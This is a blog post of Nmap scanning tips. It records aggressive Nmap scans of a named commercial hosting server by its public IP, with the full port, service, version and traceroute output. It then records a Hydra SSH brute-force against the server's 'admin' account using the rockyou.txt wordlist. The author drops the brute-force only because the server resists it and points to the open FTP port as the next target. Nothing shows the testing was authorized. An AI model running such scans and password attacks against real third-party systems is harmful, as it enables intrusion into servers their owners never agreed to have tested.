Very useful Nmap scanning tips for getting information from a host.

Posted: July 20, 2017. At: 11:47 AM. This was 1 month ago. Post ID: 10962

The nmap -A -P0 command line will scan a host and get information about the host and what is running on it. Press j whilst the scan is running to print statistics about the progress of the scan. Press it again to update it.

┌─[root@parrot][/home/user]
└──╼ #nmap -A -P0 202.146.215.17
 
Starting Nmap 7.50 ( https://nmap.org ) at 2017-07-19 23:48 UTC
Stats: 0:01:56 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 34.67% done; ETC: 23:54 (0:03:37 remaining)

Very useful when a scan is taking a very long time to perform and feedback is required on how long it has to go.

We are getting there slowly.

┌─[root@parrot][/home/user]
└──╼ #nmap -A -P0 202.146.215.17
 
Starting Nmap 7.50 ( https://nmap.org ) at 2017-07-19 23:48 UTC
Stats: 0:01:56 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 34.67% done; ETC: 23:54 (0:03:37 remaining)
Stats: 0:05:26 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 43.46% done; ETC: 00:01 (0:07:04 remaining)
Stats: 0:07:02 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 47.70% done; ETC: 00:03 (0:07:43 remaining)
Stats: 0:07:40 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 49.39% done; ETC: 00:04 (0:07:50 remaining)
Stats: 0:11:04 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 58.17% done; ETC: 00:07 (0:07:57 remaining)
Stats: 0:11:11 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 58.49% done; ETC: 00:08 (0:07:56 remaining)

And we are done with our scan. This server has open SSH, FTP and HTTP ports…

Nmap scan report for nix17.qnetau.com (202.146.215.17)
Host is up (0.048s latency).
Not shown: 941 filtered ports, 55 closed ports
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      ProFTPD
| ssl-cert: Subject: commonName=*.qnetau.com
| Subject Alternative Name: DNS:*.qnetau.com, DNS:qnetau.com
| Not valid before: 2013-02-11T00:00:00
|_Not valid after:  2018-02-10T23:59:59
80/tcp   open  http     Apache httpd
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Apache
|_http-title: Quadra Hosting Server
443/tcp  open  ssl/http Apache httpd
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Apache
|_http-title: Quadra Hosting Server
| ssl-cert: Subject: commonName=*.qnetau.com
| Subject Alternative Name: DNS:*.qnetau.com, DNS:qnetau.com
| Not valid before: 2013-02-11T00:00:00
|_Not valid after:  2018-02-10T23:59:59
|_ssl-date: TLS randomness does not represent time
8022/tcp open  ssh      OpenSSH 5.3 (protocol 2.0)
Aggressive OS guesses: Linux 3.0 (96%), ProVision-ISR security DVR (95%), Linux 2.6.32 (95%), OpenWrt 0.9 - 7.09 (Linux 2.4.30 - 2.4.34) (93%), OpenWrt White Russian 0.9 (Linux 2.4.30) (93%), OpenWrt Kamikaze 7.09 (Linux 2.6.22) (93%), HP P2000 G3 NAS device (93%), Linux 2.6.32 - 3.10 (93%), HIKVISION DS-7600 Linux Embedded NVR (Linux 2.6.10) (93%), DD-WRT v24-sp2 (Linux 3.10) (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 6 hops
 
TRACEROUTE (using port 49163/tcp)
HOP RTT      ADDRESS
1   4.70 ms  dsldevice.lan (10.1.1.1)
2   45.69 ms masceqx-lns14.syd.nsw.m2core.net.au (122.148.3.99)
3   44.06 ms 241.02.static.syd.iprimus.net.au (203.134.3.241)
4   52.04 ms 24469.syd.equinix.com (45.127.172.29)
5   50.86 ms ar1.syd1.quadrahosting.com.au (202.146.208.1)
6   41.73 ms nix17.qnetau.com (202.146.215.17)
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1862.27 seconds

Now I can scan the SSH port on the remote server. use the -s parameter to specifiy the SSH port if it is not port 22.

Using this command line: hydra -l admin -s 8022 -P rockyou.txt 202.146.215.17 -t 4 ssh.

┌─[][root@parrot][/home/user]
└──╼ #hydra -l admin -s 8022 -P rockyou.txt 202.146.215.17 -t 4 ssh
Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
 
Hydra (http://www.thc.org/thc-hydra) starting at 2017-07-20 00:30:41
[DATA] max 4 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~56032 tries per task
[DATA] attacking service ssh on port 8022
[STATUS] 17.00 tries/min, 17 tries in 00:01h, 14344385 to do in 14063:08h, 4 active
[STATUS] 13.67 tries/min, 41 tries in 00:03h, 14344385 to do in 17493:10h, 4 active
[STATUS] 12.71 tries/min, 89 tries in 00:07h, 14344385 to do in 18803:31h, 4 active
[STATUS] 12.27 tries/min, 184 tries in 00:15h, 14344344 to do in 19489:36h, 4 active

I had a lot of problems with this approach as the server has some protection against SSH bruteforce, but there is also an open FTP port as well.

But now I am trying to get more information about the server. Using this command line: nmap -A -P0 -sX 202.146.215.17.

[email protected]:~# nmap -A -P0 -sX 202.146.215.17
 
Starting Nmap 6.40 ( http://nmap.org ) at 2017-07-20 01:40 UTC

And as before, I can press j to get feedback about the progress of the scan.

[email protected]:~# nmap -A -P0 -sX 202.146.215.17
 
Starting Nmap 6.40 ( http://nmap.org ) at 2017-07-20 01:40 UTC
Stats: 0:03:41 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 6.70% done; ETC: 01:49 (0:04:39 remaining)
Stats: 0:04:23 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 24.50% done; ETC: 01:48 (0:03:11 remaining)

Now I get a verbose output of the Nmap scan of the target host.

Nmap scan report for nix17.qnetau.com (202.146.215.17)
Host is up (0.0029s latency).
Not shown: 997 open|filtered ports
PORT     STATE SERVICE  VERSION
80/tcp   open  http     Apache httpd
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Quadra Hosting Server
443/tcp  open  ssl/http Apache httpd
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Quadra Hosting Server
| ssl-cert: Subject: commonName=*.qnetau.com
| Not valid before: 2013-02-11T00:00:00+00:00
|_Not valid after:  2018-02-10T23:59:59+00:00
|_ssl-date: 1985-01-15T10:30:54+00:00; -32y185d15h22m13s from local time.
8022/tcp open  ssh      OpenSSH 5.3 (protocol 2.0)
|_ssh-hostkey: 1024 ec:50:36:e5:e4:11:49:42:d5:fb:b9:0a:b6:e9:1f:13 (DSA)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.32 (94%), Linux 2.6.18 - 2.6.22 (93%), Linux 3.2.0 (88%), OpenWrt Kamikaze 8.09 (Linux 2.6.25.20) (88%), Tomato 1.27 - 1.28 (Linux 2.4.20) (88%), IPCop 1.9.19 or IPFire firewall 2.9 (Linux 2.6.32) (87%), Netgear DG834G WAP or Western Digital WD TV media player (87%), Linux 3.2.1 (87%), Linux 3.2 (86%), OpenWrt White Russian 0.9 (Linux 2.4.30) (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 7 hops
 
TRACEROUTE (using proto 1/icmp)
HOP RTT      ADDRESS
1   1.06 ms  ec2-XX-XX-0-20.ap-southeast-2.compute.amazonaws.com (XX.XXX.0.20)
2   2.38 ms  XX.XXX.XXX.XXX
3   20.56 ms XX.XX.XX.XX
4   2.32 ms  XX.XX.XX.XX
5   2.46 ms  24469.syd.equinix.com (45.127.172.29)
6   3.27 ms  ar1.syd1.quadrahosting.com.au (202.146.208.1)
7   2.97 ms  nix17.qnetau.com (202.146.215.17)
 
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2223.22 seconds

These Nmap tips should help out any budding penetration tester. Good way to get information about the progress of a scan that is taking a very long time to complete.

No comments have been made. Use this form to start the conversation :)

Leave a Reply